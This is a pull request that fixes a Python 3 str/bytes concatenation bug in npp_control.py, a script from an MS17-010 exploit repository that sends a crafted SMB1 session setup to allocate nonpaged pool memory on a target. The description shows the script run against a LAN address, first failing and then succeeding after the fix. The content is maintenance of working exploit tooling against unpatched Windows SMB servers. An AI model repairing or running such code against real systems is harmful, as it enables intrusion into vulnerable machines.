### PR TITLE
Fixed concat problem in npp_control

### DIFF
--- a/npp_control.py
+++ b/npp_control.py
@@ -41,7 +41,7 @@ sessionSetup['Parameters']['SecurityBlobLength'] = 0  # this is OEMPasswordLen f
 sessionSetup['Parameters']['Capabilities']       = smb.SMB.CAP_EXTENDED_SECURITY | smb.SMB.CAP_USE_NT_ERRORS
 
 # allocate nonpaged pool size 0x15ff (padding 1 byte, AccountName 2 bytes, PrimaryDomain 2 bytes)
-sessionSetup['Data'] = pack('<H', 0x1604) + '\x00'*20
+sessionSetup['Data'] = pack('<H', 0x1604) + b'\x00'*20
 pkt.addCommand(sessionSetup)
 
 conn.sendSMB(pkt)


### PR DESCRIPTION
**fixed:**

```
enty8080@Ivans-Air MS17-010-master % python3 npp_control.py 192.168.2.114
Traceback (most recent call last):
  File "/Users/enty8080/Desktop/MS17-010-master/npp_control.py", line 44, in <module>
    sessionSetup['Data'] = pack('<H', 0x1604) + '\x00'*20
TypeError: can't concat str to bytes
enty8080@Ivans-Air MS17-010-master % python3 npp_control.py 192.168.2.114
Traceback (most recent call last):
  File "/Users/enty8080/Desktop/MS17-010-master/npp_control.py", line 44, in <module>
    sessionSetup['Data'] = pack('<H', 0x1604) + '\x00'*20
TypeError: can't concat str to bytes
enty8080@Ivans-Air MS17-010-master %
```

**after fix:**

```
enty8080@Ivans-Air MS17-010-master % python3 npp_control.py 192.168.2.114
SMB1 session setup allocate nonpaged pool success
enty8080@Ivans-Air MS17-010-master %
```